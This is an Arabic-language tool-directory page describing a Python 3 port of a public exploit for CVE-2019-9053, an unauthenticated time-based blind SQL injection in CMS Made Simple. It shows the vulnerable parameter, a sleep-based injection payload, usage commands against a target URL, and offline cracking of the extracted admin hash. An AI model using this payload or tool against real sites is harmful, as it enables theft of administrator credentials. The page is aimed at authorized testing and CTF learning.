Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
cve-2019-9053-py3 — استغلال حقن SQL أعمى قائم على الوقت دون مصادقة لـ CMS Made Simple ≤ 2.2.9 (CVE-2019-9053)، منقول إلى Python 3. | Kitploit
أدوات/GitHubGitHub/vedantrana73/cve-2019-9053-py3
كسر كلمات المرورتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالتعلم والتعليم
GitHubvedantrana73/cve-2019-9053-py3

cve-2019-9053-py3

استغلال حقن SQL أعمى قائم على الوقت دون مصادقة لـ CMS Made Simple ≤ 2.2.9 (CVE-2019-9053)، منقول إلى Python 3.

عرض المستودع
منذ شهر واحدلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2019-9053 — استغلال SQLi في CMS Made Simple (Python 3)

Python CVE Type Target License

إخلاء مسؤولية: هذه الأداة مخصّصة لاختبار الاختراق المصرّح به ولأغراض تعليمية فقط. تشغيلها ضد أنظمة دون إذن كتابي صريح يعدّ غير قانوني. لا يتحمل المؤلف أي مسؤولية عن سوء الاستخدام.


نظرة عامة

هذه نسخة Python 3 من الاستغلال العام لثغرة CVE-2019-9053 — وهي ثغرة حقن SQL أعمى قائمة على الزمن دون مصادقة في CMS Made Simple ≤ 2.2.9.

المُعامِل القابل للاستغلال هو m1_idlist على نقطة النهاية /moduleinterface.php (وحدة الأخبار). يتم تمرير إدخال المستخدم دون تنقية إلى استعلام SQL، مما يسمح لمهاجم دون مصادقة باستخراج salt الخاص بالمسؤول واسم المستخدم والبريد الإلكتروني وتجزئة كلمة المرور — مع إمكانية كسر كلمة المرور دون اتصال.

الاستغلال الأصلي بواسطة Daniele Scanu @ Certimeter Group.
نسخة Python 3 مع إصلاحات وتنظيف.


كيف يعمل

يستخدم الاستغلال أوراكل زمني (timing oracle) — حيث يحقن SELECT sleep(T) في شرط LIKE داخل SQL ويقيس زمن استجابة HTTP. إذا تأخّر الخادم لمدة ≥ T ثانية، يكون الشرط المحقون صحيحًا. وهذا يسمح باستخراج البيانات حرفًا بحرف دون ظهور أي بيانات في نص استجابة HTTP.

root@kitploit:~
Payload structure:
  m1_idlist=a,b,1,5))+and+(select+sleep(1)+from+cms_users
            +where+password+like+0x{hex(known_prefix+guess)}25
            +and+user_id+like+0x31)+--+

ترتيب الاستخراج:

بعد الاستخراج، يقوم هجوم قاموس دون اتصال اختياري بحساب MD5(salt + word) مقابل قائمة كلمات — دون الحاجة إلى أي طلبات شبكة إضافية.


تغييرات Python 3

كان النص البرمجي الأصلي مكتوبًا لـ Python 2. تم إصلاح التغييرات غير المتوافقة التالية:


المتطلبات

root@kitploit:~
pip3 install requests termcolor
الاعتمادالغرض
requestsطلبات HTTP إلى الهدف
termcolorإخراج طرفية ملوّن

الاستخدام

root@kitploit:~
# Basic extraction (no password cracking)
python3 exploit.py -u http://<target-ip>/simple

# Extraction + offline password cracking
python3 exploit.py -u http://<target-ip>/simple --crack -w /usr/share/wordlists/rockyou.txt

الخيارات

العلمالوصف
-u, --urlعنوان URL الأساسي لتثبيت CMS Made Simple

مثال على المخرجات

root@kitploit:~
[+] Salt for password found: 1234abcd
[+] Username found: admin
[+] Email found: [email protected]
[+] Password found: a1b2c3d4e5f6...
[+] Password cracked: password123

تفاصيل CVE


المراجع

  • NVD — CVE-2019-9053
  • الاستغلال الأصلي — Exploit-DB #46635
  • CMS Made Simple

الجانب القانوني

يوفَّر هذا الاستغلال لاختبار الاختراق المصرّح به ولأغراض CTF/تعليمية فقط.
الاستخدام غير المصرّح به ضد أنظمة لا تملكها أو ليس لديك إذن كتابي صريح لاختبارها يُعد جريمة جنائية بموجب قانون تكنولوجيا المعلومات لسنة 2000 (الهند) والقوانين المماثلة حول العالم.

تنزيل الأداة
الخطوةالحقلالجدولملاحظات
1Saltcms_siteprefsمطلوب لكسر كلمة المرور
2اسم المستخدمcms_usersuser_id = 1 (admin)
3البريد الإلكترونيcms_usersuser_id = 1 (admin)
4كلمة المرورcms_usersمخزنة كـ MD5(salt + password)
#التغييرالسبب
1print "..." → print("...")print في Python 3 هي دالة
2hashlib.md5(str(salt) + line) → hashlib.md5((salt + line).encode())تتطلب hashlib.md5() بيانات من نوع bytes في Python 3
3dict = open(wordlist) → with open(wordlist) as wordlist_filedict يحجب اسمًا مدمجًا؛ تم التبديل إلى مدير سياق
4print "\033c" → print("\033c", end="")يتجنب سطرًا جديدًا مزدوجًا عند مسح الطرفية
5print colored(...) → print(colored(...))تُرجع colored() نصًا؛ تحتاج إلى غلاف print()
-w, --wordlistمسار إلى قائمة كلمات لكسر كلمة المرور دون اتصال
-c, --crackتفعيل وضع كسر كلمة المرور
الحقلالقيمة
CVE IDCVE-2019-9053
CVSS Score7.5 (مرتفع)
النوعحقن SQL أعمى قائم على الزمن دون مصادقة
المتأثرCMS Made Simple ≤ 2.2.9
المعاملm1_idlist في وحدة الأخبار
المصادقة المطلوبةلا شيء
التصحيحCMS Made Simple 2.2.10+